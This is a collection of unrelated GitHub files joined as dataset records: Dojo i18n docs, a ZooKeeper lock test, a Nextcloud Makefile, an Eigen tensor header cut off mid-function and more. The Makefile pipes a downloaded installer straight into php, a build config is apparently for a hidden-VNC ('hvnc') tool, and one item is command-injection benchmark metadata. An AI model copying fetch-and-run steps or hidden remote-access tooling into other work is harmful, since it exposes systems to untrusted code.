但是,如果应用程序使用了基于类的部件,例如来自 `@dojo/widgets` 套件中的部件,则需要在应用程序的注册表(registry)中定义默认区域。这需要使用 `@dojo/framework/core/mixins/I18n` 中的工具函数 `registryI18nInjector`。
> src/main.tsx
```ts
import renderer, { tsx } from '@dojo/framework/core/vdom';
import Registry from '@dojo/framework/core/Registry';
import { registerI18nInjector } from '@dojo/framework/core/mixins/I18n';
import App from './App';
const registry = new Registry();
registerI18nInjector({ locale: 'en-us', rtl: false }, registry);
const r = renderer(() => <App />);
r.mount({ registry });
```
## 更改应用程序中的区域设置
- 使用 [i18n 中间件](/learn/middleware/available-middleware#i18n),用户可在支持的区域设置之间进行选择,然后使用中间件的 `.set` API 更改区域。
**提醒:** 当同时使用基于类的部件和基于函数的部件时,此中间件应该与 [`registeri18nInjector`](/learn/i18n/internationalizing-a-dojo-application/#providing-locale-data-to-i18n-aware-widgets) 一起使用,以便将区域设置的变更以响应的方式传播给所有支持 i18n 的部件。
> src/widgets/LocaleChanger.tsx
```tsx
import { create, tsx } from '@dojo/framework/core/vdom';
import i18n from '@dojo/framework/core/middleware/i18n';
const factory = create({ i18n });
export default factory(function LocaleChanger({ middleware: { i18n } }) {
return (
<div>
<button
onclick={() => {
i18n.set({ locale: 'en' });
}}
>
English
</button>
<button
onclick={() => {
i18n.set({ locale: 'fr' });
}}
>
French
</button>
</div>
);
});
```
| {
"pile_set_name": "Github"
} |
package com.whirly.recipes;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.curator.framework.recipes.locks.InterProcessReadWriteLock;
import org.apache.curator.retry.ExponentialBackoffRetry;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.concurrent.CountDownLatch;
/**
* @program: curator-example
* @description: 分布式读写锁 - 可以看到通过获得read锁生成的订单中是有重复的,而获取的写锁中是没有重复数据的。符合读写锁的特点
* @author: 赖键锋
* @create: 2019-01-22 01:13
**/
public class SharedReentrantReadWriteLockTest {
private static final int SECOND = 1000;
private static final String lock_path = "/testZK/leader_selector";
public static void main(String[] args) throws Exception {
CuratorFramework client = ZKUtils.getClient();
client.start();
// todo 在此可添加ConnectionStateListener监听
System.out.println("Server connected...");
final InterProcessReadWriteLock lock = new InterProcessReadWriteLock(client, lock_path);
final CountDownLatch down = new CountDownLatch(1);
for (int i = 0; i < 30; i++) {
final int index = i;
new Thread(new Runnable() {
@Override
public void run() {
try {
down.await();
if (index % 2 == 0) {
lock.readLock().acquire();
SimpleDateFormat sdf = new SimpleDateFormat("HH:mm:ss|SSS");
String orderNo = sdf.format(new Date());
System.out.println("[READ]生成的订单号是:" + orderNo);
} else {
lock.writeLock().acquire();
SimpleDateFormat sdf = new SimpleDateFormat("HH:mm:ss|SSS");
String orderNo = sdf.format(new Date());
System.out.println("[WRITE]生成的订单号是:" + orderNo);
}
} catch (Exception e) {
e.printStackTrace();
} finally {
try {
if (index % 2 == 0) {
lock.readLock().release();
} else {
lock.writeLock().release();
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
}).start();
}
// 保证所有线程内部逻辑执行时间一致
down.countDown();
Thread.sleep(10 * SECOND);
if (client != null) {
client.close();
}
System.out.println("Server closed...");
}
}
| {
"pile_set_name": "Github"
} |
<test-metadata>
<benchmark-version>1.2</benchmark-version>
<category>cmdi</category>
<test-number>01928</test-number>
<vulnerability>true</vulnerability>
<cwe>78</cwe>
</test-metadata>
| {
"pile_set_name": "Github"
} |
<?php
function foo() {
if (rand(0,1)) {
return 1;
} else {
return 2;
}
}
function bar() {
if (rand(0,1)) {
return 1;
} else {
return 2;
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright Red Hat Inc. and/or its affiliates and other contributors
* as indicated by the authors tag. All rights reserved.
*
* This copyrighted material is made available to anyone wishing to use,
* modify, copy, or redistribute it subject to the terms and conditions
* of the GNU General Public License version 2.
*
* This particular file is subject to the "Classpath" exception as provided in the
* LICENSE file that accompanied this code.
*
* This program is distributed in the hope that it will be useful, but WITHOUT A
* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
* PARTICULAR PURPOSE. See the GNU General Public License for more details.
* You should have received a copy of the GNU General Public License,
* along with this distribution; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
* MA 02110-1301, USA.
*/
@noanno
void comp2(Integer[] ints) {
value i2 = {for (i in ints) for (j in ints) i*2+3/j };
} | {
"pile_set_name": "Github"
} |
<Type Name="PPModule" FullName="PepperSharp.PPModule">
<TypeSignature Language="C#" Value="public struct PPModule" />
<TypeSignature Language="ILAsm" Value=".class public sequential ansi sealed beforefieldinit PPModule extends System.ValueType" />
<AssemblyInfo>
<AssemblyName>Xamarin.PepperSharp</AssemblyName>
<AssemblyVersion>1.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Base>
<BaseTypeName>System.ValueType</BaseTypeName>
</Base>
<Interfaces />
<Docs>
<summary>To be added.</summary>
<remarks>To be added.</remarks>
</Docs>
<Members />
</Type>
| {
"pile_set_name": "Github"
} |
# This file is licensed under the Affero General Public License version 3 or
# later. See the COPYING file.
# @author Bernhard Posselt <[email protected]>
# @copyright Bernhard Posselt 2016
# Generic Makefile for building and packaging a Nextcloud app which uses npm and
# Composer.
#
# Dependencies:
# * make
# * which
# * curl: used if phpunit and composer are not installed to fetch them from the web
# * tar: for building the archive
# * npm: for building and testing everything JS
#
# If no composer.json is in the app root directory, the Composer step
# will be skipped. The same goes for the package.json which can be located in
# the app root or the js/ directory.
#
# The npm command by launches the npm build script:
#
# npm run build
#
# The npm test command launches the npm test script:
#
# npm run test
#
# The idea behind this is to be completely testing and build tool agnostic. All
# build tools and additional package managers should be installed locally in
# your project, since this won't pollute people's global namespace.
#
# The following npm scripts in your package.json install the npm dependencies
# and use gulp as build system (notice how everything is run from the
# node_modules folder):
#
# "scripts": {
# "test": "node node_modules/gulp-cli/bin/gulp.js karma",
# "prebuild": "npm install",
# "build": "node node_modules/gulp-cli/bin/gulp.js"
# },
app_name:=$(notdir $(CURDIR))
build_tools_directory:=$(CURDIR)/build/tools
source_build_directory:=$(CURDIR)/build/source/$(app_name)
source_artifact_directory:=$(CURDIR)/build/artifacts/source
source_package_name:=$(source_artifact_directory)/$(app_name)
appstore_build_directory:=$(CURDIR)/build/appstore/$(app_name)
appstore_artifact_directory:=$(CURDIR)/build/artifacts/appstore
appstore_package_name:=$(appstore_artifact_directory)/$(app_name)
npm:=$(shell which npm 2> /dev/null)
composer:=$(shell which composer 2> /dev/null)
ifeq (,$(composer))
composer:=php $(build_tools_directory)/composer.phar
endif
# code signing
# assumes the following:
# * the app is inside the nextcloud/apps folder
# * the private key is located in ~/.nextcloud/news.key
# * the certificate is located in ~/.nextcloud/news.crt
occ:=$(CURDIR)/../../occ
private_key:=$(HOME)/.nextcloud/$(app_name).key
certificate:=$(HOME)/.nextcloud/$(app_name).crt
sign:=php -f $(occ) integrity:sign-app --privateKey="$(private_key)" --certificate="$(certificate)"
sign_skip_msg:="Skipping signing, either no key and certificate found in $(private_key) and $(certificate) or occ can not be found at $(occ)"
ifneq (,$(wildcard $(private_key)))
ifneq (,$(wildcard $(certificate)))
ifneq (,$(wildcard $(occ)))
CAN_SIGN=true
endif
endif
endif
all: build
# Fetches the PHP and JS dependencies and compiles the JS. If no composer.json
# is present, the composer step is skipped, if no package.json or js/package.json
# is present, the npm step is skipped
.PHONY: build
build:
$(MAKE) composer
$(MAKE) npm
# Installs and updates the composer dependencies. If composer is not installed
# a copy is fetched from the web
.PHONY: composer
composer:
ifeq (, $(shell which composer 2> /dev/null))
@echo "No composer command available, downloading a copy from the web"
mkdir -p $(build_tools_directory)
curl -sS https://getcomposer.org/installer | php
mv composer.phar $(build_tools_directory)
endif
$(composer) install --prefer-dist --no-dev
# Installs npm dependencies
.PHONY: npm
npm:
ifneq (, $(npm))
cd js && $(npm) run build
else
@echo "npm command not available, please install nodejs first"
@exit 1
endif
# Removes the appstore build
.PHONY: clean
clean:
rm -rf ./build
# Reports PHP codestyle violations
.PHONY: phpcs
phpcs:
./vendor/bin/phpcs --standard=PSR2 --ignore=lib/Migration/Version*.php lib
# Reports PHP static violations
.PHONY: phpstan
phpstan:
./vendor/bin/phpstan analyse --level=1 lib
# Same as clean but also removes dependencies installed by composer and
# npm
.PHONY: distclean
distclean: clean
rm -rf vendor
rm -rf node_modules
rm -rf js/node_modules
# Builds the source and appstore package
.PHONY: dist
dist:
make distclean
make build
make source
make appstore
# Builds the source package
.PHONY: source
source:
rm -rf $(source_build_directory) $(source_artifact_directory)
mkdir -p $(source_build_directory) $(source_artifact_directory)
rsync -rv . $(source_build_directory) \
--exclude=/.git/ \
--exclude=/.idea/ \
--exclude=/build/ \
--exclude=/js/node_modules/ \
--exclude=*.log
ifdef CAN_SIGN
$(sign) --path "$(source_build_directory)"
else
@echo $(sign_skip_msg)
endif
tar -cvzf $(source_package_name).tar.gz -C $(source_build_directory)/../ $(app_name)
# Builds the source package for the app store, ignores php and js tests
.PHONY: appstore
appstore:
rm -rf $(appstore_build_directory) $(appstore_artifact_directory)
mkdir -p $(appstore_build_directory) $(appstore_artifact_directory)
./bin/tools/generate_authors.php
cp -r \
"appinfo" \
"css" \
"img" \
"l10n" \
"lib" \
"templates" \
"vendor" \
"COPYING" \
"AUTHORS.md" \
"CHANGELOG.md" \
$(appstore_build_directory)
#remove stray .htaccess files since they are filtered by nextcloud
find $(appstore_build_directory) -name .htaccess -exec rm {} \;
# on macOS there is no option "--parents" for the "cp" command
mkdir -p $(appstore_build_directory)/js/build $(appstore_build_directory)/js/admin
cp js/build/app.min.js $(appstore_build_directory)/js/build
cp js/admin/Admin.js $(appstore_build_directory)/js/admin
ifdef CAN_SIGN
$(sign) --path="$(appstore_build_directory)"
else
@echo $(sign_skip_msg)
endif
tar -czf $(appstore_package_name).tar.gz -C $(appstore_build_directory)/../ $(app_name)
.PHONY: js-test
js-test:
cd js && $(npm) run test
.PHONY: php-test-dependencies
php-test-dependencies:
$(composer) update --prefer-dist
.PHONY: unit-test
unit-test:
./vendor/phpunit/phpunit/phpunit -c phpunit.xml --coverage-clover build/php-unit.clover
# \Test\TestCase is only allowed to access the db if TRAVIS environment variable is set
.PHONY: integration-test
integration-test:
env TRAVIS=1 ./vendor/phpunit/phpunit/phpunit -c phpunit.integration.xml
# Command for running JS and PHP tests. Works for package.json files in the js/
# and root directory. If phpunit is not installed systemwide, a copy is fetched
# from the internet
.PHONY: test
test: php-test-dependencies
$(MAKE) unit-test
$(MAKE) integration-test
$(MAKE) phpcs
$(MAKE) phpstan
$(MAKE) js-test
./bin/tools/generate_authors.php
| {
"pile_set_name": "Github"
} |
fn:format-date( xs:date("2010-12-31"), "[Dw]", "en-US", (), () ) eq "thirty one"
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="windows-1251"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9,00"
Name="hvnc_exe"
ProjectGUID="{4E840B10-369A-4F4A-8D76-95801A48DE59}"
RootNamespace="hvnc_exe"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="0"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="3"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
OmitFramePointers="true"
AdditionalIncludeDirectories=""..\HVNC Lib""
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
RuntimeLibrary="0"
BufferSecurityCheck="false"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="zlib.lib minizip.lib hvnc.lib libvncsrv.lib syslib.lib ws2_32.lib shlwapi.lib Psapi.lib strmiids.lib ntdll.lib Iphlpapi.lib UxTheme.lib vfw32.lib oleacc.lib crypt32.lib version.lib dbghelp.lib"
LinkIncremental="1"
AdditionalLibraryDirectories="..\ntdll\x86;"$(OutDir)""
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="1"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\main.cpp"
>
</File>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
</Filter>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>
| {
"pile_set_name": "Github"
} |
/*
** Copyright (c) 2012 The Khronos Group Inc.
**
** Permission is hereby granted, free of charge, to any person obtaining a
** copy of this software and/or associated documentation files (the
** "Materials"), to deal in the Materials without restriction, including
** without limitation the rights to use, copy, modify, merge, publish,
** distribute, sublicense, and/or sell copies of the Materials, and to
** permit persons to whom the Materials are furnished to do so, subject to
** the following conditions:
**
** The above copyright notice and this permission notice shall be included
** in all copies or substantial portions of the Materials.
**
** THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
** EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
** MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
** IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
** CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
** TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
** MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
*/
#ifdef GL_ES
precision mediump float;
#endif
void main()
{
float2 f; // float2 is not a valid datatype
}
| {
"pile_set_name": "Github"
} |
{% extends 'email/base.html' %}
{% block styles %}
{% include 'questions/includes/reply_email_styles.css' %}
.button + a {
display: block;
float: left;
margin: 16px 0 0 16px;
}
{% endblock %}
{% block header %}
<h1>{{ question_title }}</h1>
<img class="avatar" src="{{ profile_avatar(answerer) }}">
<div class="user-meta">
<strong>{{ display_name(answerer) }}</strong>
<span>{{ created }}</span>
</div>
<div class="arrow"></div>
{% endblock %}
{% block content %}
<div class="answer">{{ answer_html }}</div>
{% endblock %}
{% block prefooter %}
<div class="gi-box">
{% trans url="https://support.mozilla.org/kb/avoid-and-report-mozilla-tech-support-scams" %}
<strong>Avoid support scams.</strong>
We will never ask you to call or text a phone number or share personal information.
<a href="{{ url }}">Learn more here.</a>
{% endtrans %}
</div>
<p>
<a class="button" href="https://{{ host }}{{ solution_url }}">{{ _('Mark it as solved') }}</a>
<a href="https://{{ host }}{{ answer_url }}">{{ _('This doesn\'t solve my problem') }}</a>
</p>
<div class="gi-box">
<a href="https://{{ host }}/questions?filter=unsolved">{{ _('Browse for unsolved questions and help a Firefox user') }}</a>
<br/>{{ _("Solving 1 issue helps up to 1,000 users a day!") }}
</div>
<div class="no-reply">
{% trans url="https://%s%s" % (host, answer_url) %}
This email is automatically sent by a robot. Our robot can’t respond to
your question, but our forum contributors can! If you want to respond to
them, please <a href="{{ url }}">click here</a>.
{% endtrans %}
</div>
{% endblock %}
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2014 Navdeep Jaitly <[email protected]>
// Benoit Steiner <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifndef EIGEN_CXX11_TENSOR_TENSOR_REVERSE_H
#define EIGEN_CXX11_TENSOR_TENSOR_REVERSE_H
namespace Eigen {
/** \class TensorReverse
* \ingroup CXX11_Tensor_Module
*
* \brief Tensor reverse elements class.
*
*/
namespace internal {
template<typename ReverseDimensions, typename XprType>
struct traits<TensorReverseOp<ReverseDimensions,
XprType> > : public traits<XprType>
{
typedef typename XprType::Scalar Scalar;
typedef traits<XprType> XprTraits;
typedef typename XprTraits::StorageKind StorageKind;
typedef typename XprTraits::Index Index;
typedef typename XprType::Nested Nested;
typedef typename remove_reference<Nested>::type _Nested;
static const int NumDimensions = XprTraits::NumDimensions;
static const int Layout = XprTraits::Layout;
typedef typename XprTraits::PointerType PointerType;
};
template<typename ReverseDimensions, typename XprType>
struct eval<TensorReverseOp<ReverseDimensions, XprType>, Eigen::Dense>
{
typedef const TensorReverseOp<ReverseDimensions, XprType>& type;
};
template<typename ReverseDimensions, typename XprType>
struct nested<TensorReverseOp<ReverseDimensions, XprType>, 1,
typename eval<TensorReverseOp<ReverseDimensions, XprType> >::type>
{
typedef TensorReverseOp<ReverseDimensions, XprType> type;
};
} // end namespace internal
template<typename ReverseDimensions, typename XprType>
class TensorReverseOp : public TensorBase<TensorReverseOp<ReverseDimensions,
XprType>, WriteAccessors>
{
public:
typedef typename Eigen::internal::traits<TensorReverseOp>::Scalar Scalar;
typedef typename Eigen::NumTraits<Scalar>::Real RealScalar;
typedef typename XprType::CoeffReturnType CoeffReturnType;
typedef typename Eigen::internal::nested<TensorReverseOp>::type Nested;
typedef typename Eigen::internal::traits<TensorReverseOp>::StorageKind
StorageKind;
typedef typename Eigen::internal::traits<TensorReverseOp>::Index Index;
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorReverseOp(
const XprType& expr, const ReverseDimensions& reverse_dims)
: m_xpr(expr), m_reverse_dims(reverse_dims) { }
EIGEN_DEVICE_FUNC
const ReverseDimensions& reverse() const { return m_reverse_dims; }
EIGEN_DEVICE_FUNC
const typename internal::remove_all<typename XprType::Nested>::type&
expression() const { return m_xpr; }
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE TensorReverseOp& operator = (const TensorReverseOp& other)
{
typedef TensorAssignOp<TensorReverseOp, const TensorReverseOp> Assign;
Assign assign(*this, other);
internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
return *this;
}
template<typename OtherDerived>
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE TensorReverseOp& operator = (const OtherDerived& other)
{
typedef TensorAssignOp<TensorReverseOp, const OtherDerived> Assign;
Assign assign(*this, other);
internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
return *this;
}
protected:
typename XprType::Nested m_xpr;
const ReverseDimensions m_reverse_dims;
};
// Eval as rvalue
template<typename ReverseDimensions, typename ArgType, typename Device>
struct TensorEvaluator<const TensorReverseOp<ReverseDimensions, ArgType>, Device>
{
typedef TensorReverseOp<ReverseDimensions, ArgType> XprType;
typedef typename XprType::Index Index;
static const int NumDims = internal::array_size<ReverseDimensions>::value;
typedef DSizes<Index, NumDims> Dimensions;
typedef typename XprType::Scalar Scalar;
typedef typename XprType::CoeffReturnType CoeffReturnType;
typedef typename PacketType<CoeffReturnType, Device>::type PacketReturnType;
static const int PacketSize = PacketType<CoeffReturnType, Device>::size;
typedef StorageMemory<CoeffReturnType, Device> Storage;
typedef typename Storage::Type EvaluatorPointerType;
enum {
IsAligned = false,
PacketAccess = TensorEvaluator<ArgType, Device>::PacketAccess,
BlockAccess = NumDims > 0,
PreferBlockAccess = true,
Layout = TensorEvaluator<ArgType, Device>::Layout,
CoordAccess = false, // to be implemented
RawAccess = false
};
typedef internal::TensorIntDivisor<Index> IndexDivisor;
//===- Tensor block evaluation strategy (see TensorBlock.h) -------------===//
typedef internal::TensorBlockDescriptor<NumDims, Index> TensorBlockDesc;
typedef internal::TensorBlockScratchAllocator<Device> TensorBlockScratch;
typedef typename TensorEvaluator<const ArgType, Device>::TensorBlock
ArgTensorBlock;
typedef typename internal::TensorMaterializedBlock<CoeffReturnType, NumDims,
Layout, Index>
TensorBlock;
//===--------------------------------------------------------------------===//
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorEvaluator(const XprType& op,
const Device& device)
: m_impl(op.expression(), device),
m_reverse(op.reverse()),
m_device(device)
{
// Reversing a scalar isn't supported yet. It would be a no-op anyway.
EIGEN_STATIC_ASSERT((NumDims > 0), YOU_MADE_A_PROGRAMMING_MISTAKE);
// Compute strides
m_dimensions = m_impl.dimensions();
if (static_cast<int>(Layout) == static_cast<int>(ColMajor)) {
m_strides[0] = 1;
for (int i = 1; i < NumDims; ++i) {
m_strides[i] = m_strides[i-1] * m_dimensions[i-1];
if (m_strides[i] > 0) m_fastStrides[i] = IndexDivisor(m_strides[i]);
}
} else {
m_strides[NumDims-1] = 1;
for (int i = NumDims - 2; i >= 0; --i) {
m_strides[i] = m_strides[i+1] * m_dimensions[i+1];
if (m_strides[i] > 0) m_fastStrides[i] = IndexDivisor(m_strides[i]);
}
}
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
const Dimensions& dimensions() const { return m_dimensions; }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE bool evalSubExprsIfNeeded(EvaluatorPointerType) {
m_impl.evalSubExprsIfNeeded(NULL);
return true;
}
#ifdef EIGEN_USE_THREADS
template <typename EvalSubExprsCallback>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void evalSubExprsIfNeededAsync(
EvaluatorPointerType, EvalSubExprsCallback done) {
m_impl.evalSubExprsIfNeededAsync(nullptr, [done](bool) { done(true); });
}
#endif // EIGEN_USE_THREADS
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void cleanup() {
m_impl.cleanup();
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index reverseIndex(
Index index) const {
eigen_assert(index < dimensions().TotalSize());
Index inputIndex = 0;
if (static_cast<int>(Layout) == static_cast<int>(ColMajor)) {
EIGEN_UNROLL_LOOP
for (int i = NumDims - 1; i > 0; --i) {
Index idx = index / m_fastStrides[i];
index -= idx * m_strides[i];
if (m_reverse[i]) {
idx = m_dimensions[i] - idx - 1;
}
inputIndex += idx * m_strides[i] ;
}
if (m_reverse[0]) {
inputIndex += (m_dimensions[0] - index - 1);
} else {
inputIndex += index;
}
} else {
EIGEN_UNROLL_LOOP
for (int i = 0; i < NumDims - 1; ++i) {
Index idx = index / m_fastStrides[i];
index -= idx * m_strides[i];
if (m_reverse[i]) {
idx = m_dimensions[i] - idx - 1;
}
inputIndex += idx * m_strides[i] ;
}
if (m_reverse[NumDims-1]) {
inputIndex += (m_dimensions[NumDims-1] - index - 1);
} else {
inputIndex += index;
}
}
return inputIndex;
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE CoeffReturnType coeff(
Index index) const {
return m_impl.coeff(reverseIndex(index));
}
template<int LoadMode>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
PacketReturnType packet(Index index) const
{
EIGEN_STATIC_ASSERT((PacketSize > 1), YOU_MADE_A_PROGRAMMING_MISTAKE)
eigen_assert(index+PacketSize-1 < dimensions().TotalSize());
// TODO(ndjaitly): write a better packing routine that uses
// local structure.
EIGEN_ALIGN_MAX typename internal::remove_const<CoeffReturnType>::type
values[PacketSize];
EIGEN_UNROLL_LOOP
for (int i = 0; i < PacketSize; ++i) {
values[i] = coeff(index+i);
}
PacketReturnType rslt = internal::pload<PacketReturnType>(values);
return rslt;
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
internal::TensorBlockResourceRequirements getResourceRequirements() const {
const size_t target_size = m_device.lastLevelCacheSize();
// Block evaluation reads underlying memory in reverse order, and default
// cost model does not properly catch this in bytes stored/loaded.
return internal::TensorBlockResourceRequirements::skewed<Scalar>(
target_size)
.addCostPerCoeff({0, 0, 24});
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorBlock
block(TensorBlockDesc& desc, TensorBlockScratch& scratch,
bool /*root_of_expr_ast*/ = false) const {
// TODO(ezhulenev): If underlying tensor expression supports and prefers
// block evaluation we must use it. Currently we use coeff and packet
// access into the underlying tensor expression.
// static const bool useBlockAccessForArgType =
// TensorEvaluator<ArgType, Device>::BlockAccess &&
// TensorEvaluator<ArgType, Device>::PreferBlockAccess;
static const bool isColMajor =
static_cast<int>(Layout) == static_cast<int>(ColMajor);
static const Index inner_dim_idx = isColMajor ? 0 : NumDims - 1;
const bool inner_dim_reversed = m_reverse[inner_dim_idx];
// Offset in the output block.
Index block_offset = 0;
// Offset in the input Tensor.
Index input_offset = reverseIndex(desc.offset());
// Initialize output block iterator state. Dimension in this array are
// always in inner_most -> outer_most order (col major layout).
array<BlockIteratorState, NumDims> it;
for (int i = 0; i < NumDims; ++i) {
const int dim = isColMajor ? i : NumDims - 1 - i;
it[i].size = desc.dimension(dim);
it[i].count = 0;
it[i].reverse = m_reverse[dim];
it[i].block_stride =
i == 0 ? 1 : (it[i - 1].size * it[i - 1].block_stride);
it[i].block_span = it[i].block_stride * (it[i].size - 1);
it[i].input_stride = m_strides[dim];
it[i].input_span = it[i].input_stride * (it[i].size - 1);
if (it[i].reverse) {
it[i].input_stride = -1 * it[i].input_stride;
it[i].input_span = -1 * it[i].input_span;
}
}
// If multiple inner dimensions have the same reverse flag, check if we can
// merge them into a single virtual inner dimension.
int effective_inner_dim = 0;
for (int i = 1; i < NumDims; ++i) {
if (it[i].reverse != it[effective_inner_dim].reverse) break;
if (it[i].block_stride != it[effective_inner_dim].size) break;
if (it[i].block_stride != numext::abs(it[i].input_stride)) break;
it[i].size = it[effective_inner_dim].size * it[i].size;
it[i].block_stride = 1;
it[i].input_stride = (inner_dim_reversed ? -1 : 1);
it[i].block_span = it[i].block_stride * (it[i].size - 1);
it[i].input_span = it[i].input_stride * (it[i].size - 1);
effective_inner_dim = i;
}
eigen_assert(it[effective_inner_dim].block_stride == 1);
eigen_assert(it[effective_inner_dim].input_stride ==
(inner_dim_reversed ? -1 : 1));
const Index inner_dim_size = it[effective_inner_dim].size;
// Prepare storage for the materialized reverse result.
const typename TensorBlock::Storage block_storage =
TensorBlock::prepareStorage(desc, scratch);
CoeffReturnType* block_buffer = block_storage.data();
while (it[NumDims - 1].count < it[NumDims - 1].size) {
// Copy inner-most dimension data from reversed location in input.
Index dst = block_offset;
Index src = input_offset;
// NOTE(ezhulenev): Adding vectorized path with internal::preverse showed
// worse results in benchmarks than a simple coefficient loop.
if (inner_dim_reversed) {
for (Index i = 0; i < inner_dim_size; ++i) {
block_buffer[dst] = m_impl.coeff(src);
++dst;
--src;
}
} else {
for (Index i = 0; i < inner_dim_size; ++i) {
block_buffer[dst] = m_impl.coeff(src);
++dst;
++src;
}
}
// For the 1d tensor we need to generate only one inner-most dimension.
if ((NumDims - effective_inner_dim) == 1) break;
// Update offset.
for (Index i = effective_inner_dim + 1; i < NumDims; ++i) {
if (++it[i].count < it[i].size) {
block_offset += it[i].block_stride;
input_offset += it[i].input_stride;
break;
}
if (i != NumDims - 1) it[i].count = 0;
block_offset -= it[i].block_span;
input_offset -= it[i].input_span;
}
}
return block_storage.AsTensorMaterializedBlock();
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorOpCost costPerCoeff(bool vectorized) const {
double compute_cost = NumDims * (2 * TensorOpCost::AddCost<Index>() +
